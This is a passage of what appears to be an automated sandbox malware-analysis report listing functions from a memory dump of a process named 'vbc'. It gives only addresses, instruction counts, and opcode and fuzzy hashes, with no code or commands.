                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                            • Instruction ID: 72298027144a1c5b3c51b5d4b1d6dc5139c2b9d10ec7cd848bd16de3ee2b6260
                            • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                            • Instruction Fuzzy Hash: D501F7B6B14204ABDF2DDB64F804F65F3AAEB84A34F214155FF158B280DB74D941C791
                            Function 0517E016 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                            • Instruction ID: 20fde8b697c45587063d6ce0943f826428c9652d233e7f4d2c049e6283873161
                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                            • Instruction Fuzzy Hash: E4017C323046889FE326C62DC948F6A7BEDFF46B54F0905A5E906CB6A1D768DC41C621
                            Function 05162582 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c12e02c8a8501ece2176d9b6b58fca198da0a4945ebe2e9a936243218039cd4a
                            • Instruction ID: a5ad453b1fab1f38c7bde046b7117d86848bddac173b5ff8bf44dc64657c8cba
                            • Opcode Fuzzy Hash: c12e02c8a8501ece2176d9b6b58fca198da0a4945ebe2e9a936243218039cd4a
                            • Instruction Fuzzy Hash: 34F0F433741A10B7C731DB5A8C44F97BAAAEB84B90F114829A51597600CB30ED02DBA0
                            Function 0522972B Relevance: .0, Instructions: 44COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                            • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                            • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                            • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                            Function 05235636 Relevance: .0, Instructions: 44COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59f2d21205e5ecf7300e4fa8dade751831a880f48d5b97f68e5c58fd56f11f82
                            • Instruction ID: 466b0ea05dbfacadc879cfdc590c160dcf83df5b39e93d13ae04b3063ef12989
                            • Opcode Fuzzy Hash: 59f2d21205e5ecf7300e4fa8dade751831a880f48d5b97f68e5c58fd56f11f82
                            • Instruction Fuzzy Hash: 77118079E10249EFCB04DFA8D445A9EB7B4FF08304F10845AB915EB381D774DA02CB54
                            Function 05235537 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93d6ac62eb8e1375ab0452b049ff9a561bf5f5d732e18210e477656668ab041d
                            • Instruction ID: b20a17aa6f6aa498d509e445ccb80d022cd4e6bb48eaec6d426bb05a1fa43fb7
                            • Opcode Fuzzy Hash: 93d6ac62eb8e1375ab0452b049ff9a561bf5f5d732e18210e477656668ab041d
                            • Instruction Fuzzy Hash: DA110C75A10249DFDB04DFA9D545B9DFBF4BF08200F044266E519EB382D774DA418B50
                            Function 05195734 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                            • Instruction ID: a9d07ecee19bd271d5f7cacccc333ba4b809418af429a4586395fdf2a78b71bc
                            • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                            • Instruction Fuzzy Hash: EEF0DC72A05214AFE71ACB5CC880F6AB7EEEB45650F064069D501EB231E771DE04CA94
                            Function 05235152 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c27977cee7ac0c4bb8fc7cc3289bcd80131d67103045edab490e6d8c63efe90
                            • Instruction ID: e12b117f20899bccf917ef58f187db419b46cb98059a159138cbea01fdcfa197
                            • Opcode Fuzzy Hash: 0c27977cee7ac0c4bb8fc7cc3289bcd80131d67103045edab490e6d8c63efe90
                            • Instruction Fuzzy Hash: BB0121B5A1024DABDB05DF69D9459DEBBB8FF48310F10445AF505F7341D774AA018BA0
                            Function 05235060 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c00f766e49b4f8b4a90cf561f3f7a8510d3dca300a2b45094f19a14b7d3fbc1
                            • Instruction ID: 2d17184002dece27a897eac870a020e9d737867ccbc9020201c6aea603692030
                            • Opcode Fuzzy Hash: 4c00f766e49b4f8b4a90cf561f3f7a8510d3dca300a2b45094f19a14b7d3fbc1
                            • Instruction Fuzzy Hash: 7A012CB5A1020DABCB04DFA9D945AEEBBB8EF48310F10445AF905F7381D775EA018BA1
                            Function 0518C073 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                            • Instruction ID: 26972deaa1f9c967322fe391573e3f57cf25929703b665e2564108ad66e5f633
                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                            • Instruction Fuzzy Hash: E1F0C2B7600614ABD334DF4DDC40E67F7EEEBC0A80F058128A545CB220EA31DD04CB90
                            Function 052350D9 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 06553e52a083f0048da919559b7a1a98d02b9458a2c422cd3e356126b306e117
                            • Instruction ID: fcb03c1e33fb4f481b44809597422ee499f4af86adf1f95b05b32ad30c9199ed
                            • Opcode Fuzzy Hash: 06553e52a083f0048da919559b7a1a98d02b9458a2c422cd3e356126b306e117
                            • Instruction Fuzzy Hash: C50121B5A1020DABDB04DF69D9459DEB7B8EF48310F50445AF505F7381D774AA018BA0
                            Function 0515C310 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                            • Instruction ID: 263f1d93e778b6dbcc3d7761a7975cfdff905c1906bfac1d773e4dd67e2a16aa
                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                            • Instruction Fuzzy Hash: D8F04C33304722DBD7325F594844F6BA7969FD1A78F1A0036FB259B200CBB08C0293D1
                            Function 0521F78A Relevance: .0, Instructions: 42COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 563de7fbe8ba7b60a6affc3225f9cadedd710af89e42a3e3812a5c0f63c8bea4
                            • Instruction ID: ba3a04cc95bbbcec207f8434e446f1d751f9aac3e71b75ede91ad1e06ffe38d9
                            • Opcode Fuzzy Hash: 563de7fbe8ba7b60a6affc3225f9cadedd710af89e42a3e3812a5c0f63c8bea4
                            • Instruction Fuzzy Hash: 5B012D75E10309AFCB04DFA9D545AAEBBF4AF08300F104055A815EB381E774DA01CB61
                            Function 052361E5 Relevance: .0, Instructions: 41COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f0f191986b153bd31f62bb425a50de24eebbcc5fae6b622ccf9301ff974b8505
                            • Instruction ID: e5651d225570d06aed5694e2163449d2edcec45e8dfd6977a423b32242c5d95b
                            • Opcode Fuzzy Hash: f0f191986b153bd31f62bb425a50de24eebbcc5fae6b622ccf9301ff974b8505
                            • Instruction Fuzzy Hash: 34014F71A10249ABDB05DFA9D545AEEBBB8AF48310F14405AF505A7280DB74EA01CBA5
                            Function 051EA4B0 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae782824cf12fc80273e17d3ec1ed0f437cc79191059c855e7421d8218884e09
                            • Instruction ID: ff8cfa4da00730e70aa825ce4524e0652ad825e40bfb3cb2350e372bb780043f
                            • Opcode Fuzzy Hash: ae782824cf12fc80273e17d3ec1ed0f437cc79191059c855e7421d8218884e09
                            • Instruction Fuzzy Hash: 54018536210619ABCF129E94D848EDA7FA6FF4C664F068101FE1966260C732D971EB91
                            Function 0519656A Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 426793b32a57ee2bf4f8f038e67c466ca8bccb1bcef14d7a84ac568187389d1f
                            • Instruction ID: 54e8006fbd502239ecd5f29af1cee863545579f3c34c3dbc568c21f5891d2e48
                            • Opcode Fuzzy Hash: 426793b32a57ee2bf4f8f038e67c466ca8bccb1bcef14d7a84ac568187389d1f
                            • Instruction Fuzzy Hash: FB018175305B849BEB2A9B2CCD4CF2577A5BB40B40F490590B9128BAD2DBB8D4018521
                            Function 0515C0F0 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb49167125248e5f8b1592d3268973512c55baa3f71a9ffba10b07cc43df4efb
                            • Instruction ID: b5686d30dbbac9734915f6b5bcb479d2989d4bc885e6b9fa7505f5d5c204804e
                            • Opcode Fuzzy Hash: fb49167125248e5f8b1592d3268973512c55baa3f71a9ffba10b07cc43df4efb
                            • Instruction Fuzzy Hash: 52F02BB2304301DBF72899158D92F3232A7E7D0665F658065EE158B2C1EB75DC0183D4
                            Function 05233749 Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                            • Instruction ID: 47f90c498f8c135660b059e3266c296e5b8199ce7c6dcf77d063eeb69f274624
                            • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                            • Instruction Fuzzy Hash: C0F04FB6A40208BFE711EB64CD42FEAB7BCEB04710F000566B916D6191EAB0EF44CB90
                            Function 052355C9 Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b538c4895e48f4771dbf252124d07df1c9356f14702058d2966a29b3aeb6c608
                            • Instruction ID: 8173f4f77da343df38205b4214020119d18f05e8f6ba7078c117504f3ff886dd
                            • Opcode Fuzzy Hash: b538c4895e48f4771dbf252124d07df1c9356f14702058d2966a29b3aeb6c608
                            • Instruction Fuzzy Hash: 3EF04FB5A1024DAFDB04EFA8D549A9EB7F4EF08300F504469B909EB381DB74EB00CB54
                            Function 051647FB Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 26b5773e0dbfce802dc452843f69d06ee38c4939854df1b44cd18db18a54bb98
                            • Instruction ID: 55e9bd835bfba1ff430759248b6eaf107a4a6c7717790e42e009ceae11305c6d
                            • Opcode Fuzzy Hash: 26b5773e0dbfce802dc452843f69d06ee38c4939854df1b44cd18db18a54bb98
                            • Instruction Fuzzy Hash: 3AF0B4319166D4DFDF33DBD8C0D8F6177DDAB00620F09496AD44A87521CBA4D8A0C650
                            Function 0521F6C7 Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 088f404d0411e2f7e08b2a5ac5aba77a1a24fc3abd044bd5a87295ee1891f8ad
                            • Instruction ID: 7cc852d8ab360ce0e02c15bfce85c54e64bd4dd2c0d901d94835650d20d0570c
                            • Opcode Fuzzy Hash: 088f404d0411e2f7e08b2a5ac5aba77a1a24fc3abd044bd5a87295ee1891f8ad
                            • Instruction Fuzzy Hash: 15F06275A20348EBDB04DFA9D509E9EB7F4AF04304F004459E915EB281DB74DA01CB54
                            Function 05220115 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 24fe7bcde64d4d57df0a0fc3a716f695cf5819ebc8760ea7967a3c21e082af44
                            • Instruction ID: e05ba4de31b1d708c51e05a7fac2b1a5b14079ad0fea7e850ad4ca84994a14ac
                            • Opcode Fuzzy Hash: 24fe7bcde64d4d57df0a0fc3a716f695cf5819ebc8760ea7967a3c21e082af44
                            • Instruction Fuzzy Hash: 1EF05C6F5397D12ACF215B3874DD7E2AFA5BF41010F491485DCA55B240CA74B483C224
                            Function 0519C5ED Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbf68ac6dd64dc1b09cc3dd35af28405d4b45111a14d6af954e9ddb847c7970b
                            • Instruction ID: c413d8af40c955ceedd3b5717554e0171f85bb2ba5f1aa61a71408334e13ce6a
                            • Opcode Fuzzy Hash: dbf68ac6dd64dc1b09cc3dd35af28405d4b45111a14d6af954e9ddb847c7970b
                            • Instruction Fuzzy Hash: B5F0E2716156D09FCF3AD758C148F6177E5BB807A8F099865D486C7752C364CC80CAD0
                            Function 051A2619 Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                            • Instruction ID: 6968e0e61179bc35d7215fe2389b178747321ff7ea657edb27bb42fb1acb1339
                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                            • Instruction Fuzzy Hash: BEE092363016002BD7229E598C84F47776EAFC2B10F050479B9045E252CAF29C0982A4
                            Function 0523547F Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75ae97ae55b5b6d007616ca231d06d3bb716df77a68f00a14471931282bef903
                            • Instruction ID: c1dba5a32fdbdb96d7da2b912baf5e7406f350bed0cd815988cc38036f28a4b0
                            • Opcode Fuzzy Hash: 75ae97ae55b5b6d007616ca231d06d3bb716df77a68f00a14471931282bef903
                            • Instruction Fuzzy Hash: 5BF08275B11648ABDB08DFA9D54AE9EB7B4AF08304F500454E606EB3C1EB74DA008754
                            Function 052354DB Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec47807b6c76635083748888dca61563d67e3d85825d7b97acfba67741b27f59
                            • Instruction ID: a1bee0a2e0be54d892ef9a92d2773a9149087c61295ef8083d78be375b954d2b
                            • Opcode Fuzzy Hash: ec47807b6c76635083748888dca61563d67e3d85825d7b97acfba67741b27f59
                            • Instruction Fuzzy Hash: 61F08271B20248ABDF04EBA9D55AE9EBBB5AF08304F500458A506EB2C1EB74EA018714
                            Function 0521F72E Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbb8a4cde8f9da3fee0d92f05f07984fd211e8f108a36d32e55fd4250779a233
                            • Instruction ID: 93e09a0bb803c5548b276b15083fd6e6fe2c78afe9b62b118914433ce9af0f65
                            • Opcode Fuzzy Hash: dbb8a4cde8f9da3fee0d92f05f07984fd211e8f108a36d32e55fd4250779a233
                            • Instruction Fuzzy Hash: CDF08275A10348ABDB04EBA9D65AE9EB7F4EF08704F400454E602EB2C1DA74DA018768
                            Function 052351CB Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74628cab4177e3a3f098685f8f2770ca5021d1f993c6dad0b85bdd9f6b9b3dff
                            • Instruction ID: 14745078b468ce81350fa12b9b63c395f86da80e9d8736fa12907921fa94405f
                            • Opcode Fuzzy Hash: 74628cab4177e3a3f098685f8f2770ca5021d1f993c6dad0b85bdd9f6b9b3dff
                            • Instruction Fuzzy Hash: E2F082B5B2424DABDB04EBA8D50AE6EB7B4AF04304F440459B915EB2C5EB74EA00C754
                            Function 051DD070 Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                            • Instruction ID: 5c4f35cfc6a3e786708b404c1890685685fdf9c9f157b8f7eddd1a3c7e015079
                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                            • Instruction Fuzzy Hash: EDF02B3364461467C231AA1D8C05F9BFBACDBD5B70F20471ABA249B1D1DB70EA01D7E6
                            Function 051955C0 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                            • Instruction ID: e1f960f27d40816f5401c2c52e5fd86694cec32dd2bd01415e83fde7feea5dd5
                            • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                            • Instruction Fuzzy Hash: E9E0E533104614ABD73A5A16D804F12FB6AFF507B0F128619A069275918770B812DAD4
                            Function 05160710 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                            • Instruction ID: 9638abed5bb02d46ca0c8067ffafe44fe9fdf96011b5fdc536175b34ba8661b3
                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                            • Instruction Fuzzy Hash: 08F0E5393083449BEB19EF15D048AE57BE9FB45360F010494EC828B301D771E991CB86
                            Function 052337B6 Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                            • Instruction ID: 1c32a5fe8466f28dbd668a4d13a0cb091bea759842be1ca95170f7fe20d80a9f
                            • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                            • Instruction Fuzzy Hash: 12E06DB2220204BBE765DB58CD06FA673ACFB10720F140659B126934D0DBB0AE40CA60
                            Function 051625E0 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b521feabbda72b418564142cd851a560b3b7b0ec3fb1b9e74d6e30f2e1cb662e
                            • Instruction ID: e44e0e3f1eb0f73bdab9ae79faf00313fda473ddd57b005293226663e755e19d
                            • Opcode Fuzzy Hash: b521feabbda72b418564142cd851a560b3b7b0ec3fb1b9e74d6e30f2e1cb662e
                            • Instruction Fuzzy Hash: 37E092322006549BC722BB29DD49F8A7BAAEF54364F114515B12557591CB34A910C784
                            Function 05162050 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 014285a1688fe1973dfc3c553b8313e328f7edeee942a6ede2273814fe4c6a30
                            • Instruction ID: 4c9ead97057bd1e3a82a8e18fda9eb856717f0f67e2c7ea72862f34bff2ce3fe
                            • Opcode Fuzzy Hash: 014285a1688fe1973dfc3c553b8313e328f7edeee942a6ede2273814fe4c6a30
                            • Instruction Fuzzy Hash: BCE0C2322005546BC711FB6DED45F4A77AEEF95260F104221F161876D1CB74FD11C794
                            Function 0515B562 Relevance: .0, Instructions: 17COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                            • Instruction ID: bdd336fee4bb0829d70a8f25f8c3be3b9089ec5b7ef04147ff4da8929cfb7989
                            • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                            • Instruction Fuzzy Hash: DBD02B31230710EFD7352F14ED08F423B71AF80B10F0404147002164F0C7B0DD41C690
